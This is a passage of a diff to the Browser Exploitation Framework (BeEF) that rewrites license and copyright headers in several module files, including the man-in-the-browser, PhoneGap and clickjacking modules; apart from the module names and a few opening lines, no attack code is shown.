 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 beef:
    module:
        get_wireless_keys:
--- a/modules/persistence/man_in_the_browser/command.js
+++ b/modules/persistence/man_in_the_browser/command.js
@@ -1,17 +1,8 @@
-//
+/*
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+ */
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 beef.execute(function() {
 	try{
--- a/modules/phonegap/phonegap_check_connection/command.js
+++ b/modules/phonegap/phonegap_check_connection/command.js
@@ -1,17 +1,9 @@
-//
+/*
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+ */
-//   You may obtain a copy of the License at
+
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 beef.execute(function() {
    var connection_type;
--- a/modules/phonegap/phonegap_persist_resume/command.js
+++ b/modules/phonegap/phonegap_persist_resume/command.js
@@ -1,17 +1,8 @@
-//
+/*
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+ */
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 // persist on over app's sleep/wake events
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -1,16 +1,9 @@
-//
+/*
-//   Licensed under the Apache License, Version 2.0 (the "License");
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//   you may not use this file except in compliance with the License.
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   You may obtain a copy of the License at
+ * See the file 'doc/COPYING' for copying permission
-//
+ */
-//       http://www.apache.org/licenses/LICENSE-2.0
+
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 beef.execute(function() {
 	var elems = {
 		outerFrame: "cjFrame",
--- a/modules/social_engineering/clickjacking/config.yaml
+++ b/modules/social_engineering/clickjacking/config.yaml
@@ -1,15 +1,7 @@
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-#   you may not use this file except in compliance with the License.
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   You may obtain a copy of the License at
+# See the file 'doc/COPYING' for copying permission
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 beef:
--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -1,17 +1,9 @@
 #
 # Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
+
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 class Clickjacking < BeEF::Core::Command
 	def self.options